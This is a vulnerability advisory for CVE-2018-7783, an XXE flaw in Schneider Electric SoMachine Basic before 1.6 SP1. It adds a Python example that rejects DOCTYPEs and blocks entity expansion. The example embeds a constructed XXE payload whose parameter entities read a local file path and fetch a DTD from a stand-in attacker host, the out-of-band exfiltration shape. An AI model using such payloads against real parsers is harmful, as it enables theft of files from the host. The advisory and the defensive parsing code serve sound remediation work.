PT-2018-18279 · Schneider Electric · SoMachine Basic

Published

2018-07-03

·

Updated

2022-01-31

·

CVE-2018-7783

CVSS v3.1

7.5

High

Vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions: Schneider Electric SoMachine Basic versions prior to 1.6 SP1
Description: SoMachine Basic is vulnerable to an XML External Entity (XXE) attack using the DTD parameter-entity technique, which results in the disclosure and retrieval of arbitrary data from the affected host via an out-of-band (OOB) channel. The vulnerability is triggered when the application opens a crafted XML project or template file: the input passed to the XML parser is not sanitized, so DTD declarations and external entities in the file are processed.
Recommendations: For Schneider Electric SoMachine Basic versions prior to 1.6 SP1, update to version 1.6 SP1 or later to resolve the issue. Until the update is applied, open only project/template files obtained from trusted sources, since exploitation requires the application to parse a crafted file, and restrict write access to stored project/template files so that an attacker cannot substitute a crafted one. The root-cause fix is to disable DTD processing and external entity resolution in the XML parser; filtering the file contents alone is not a reliable defense.
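The following is an added example, not Schneider Electric's code and not the SoMachine Basic file format. It shows the generic shape of the DTD parameter-entity OOB technique the description refers to (a constructed document with placeholder file path and hostname), a cheap pre-parse check for a DOCTYPE, and an expat configuration that refuses DTDs, parameter entities and external entity fetches, which is the parser-side fix recommended above.

```python
"""Pre-parse check and DTD-free parsing for XML project/template files.

Added example (not Schneider Electric's code). The two documents below are
constructed for illustration; they are not SoMachine Basic files.
"""
import xml.parsers.expat as expat

# Constructed benign "template": elements only, no DOCTYPE.
BENIGN_TEMPLATE = b"""<?xml version="1.0"?>
<Project name="demo"><Pou name="Main"/><Pou name="Init"/></Project>
"""

# Constructed document in the shape of the DTD parameter-entity OOB technique:
# %file would read a local file and %dtd would fetch an external DTD whose
# contents build a request carrying that file to the attacker's host.
# The file path and hostname are placeholders, not values from the advisory.
XXE_TEMPLATE = b"""<?xml version="1.0"?>
<!DOCTYPE Project [
  <!ENTITY % file SYSTEM "file:///C:/placeholder/secret.txt">
  <!ENTITY % dtd SYSTEM "http://attacker.invalid/evil.dtd">
  %dtd;
]>
<Project name="demo"/>
"""


class DtdNotAllowed(ValueError):
    """Raised when a document carries a DOCTYPE (and therefore may declare entities)."""


def has_doctype(data: bytes) -> bool:
    """Cheap pre-check: a project/template file never needs a DOCTYPE, so any
    occurrence is grounds to reject the file before it reaches the parser."""
    return b"<!DOCTYPE" in data


def parse_without_dtd(data: bytes) -> list:
    """Parse with expat configured so that no DTD, parameter entity or external
    entity is processed. Returns the element names in document order."""
    names = []
    parser = expat.ParserCreate()
    # Never expand parameter entities (the %dtd; / %file; mechanism).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        # Called at the start of the DOCTYPE, before any entity declaration
        # in the internal subset is read; abort the parse right here.
        raise DtdNotAllowed(f"DOCTYPE {doctype_name!r} rejected")

    def on_external_entity(context, base, system_id, public_id):
        # Returning 0 makes expat abort instead of fetching system_id.
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


if __name__ == "__main__":
    print("benign:", parse_without_dtd(BENIGN_TEMPLATE))
    try:
        parse_without_dtd(XXE_TEMPLATE)
    except DtdNotAllowed as exc:
        print("crafted file rejected:", exc)
```

The pre-check and the handler-level rejection are deliberately redundant: the string check is a fast gate for file intake, while the parser configuration is what actually guarantees no entity is expanded or fetched even if a DOCTYPE slips through in an unexpected encoding or spelling.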

Fix

XXE


Weakness Enumeration

Related Identifiers

CVE-2018-7783

Affected Products

SoMachine Basic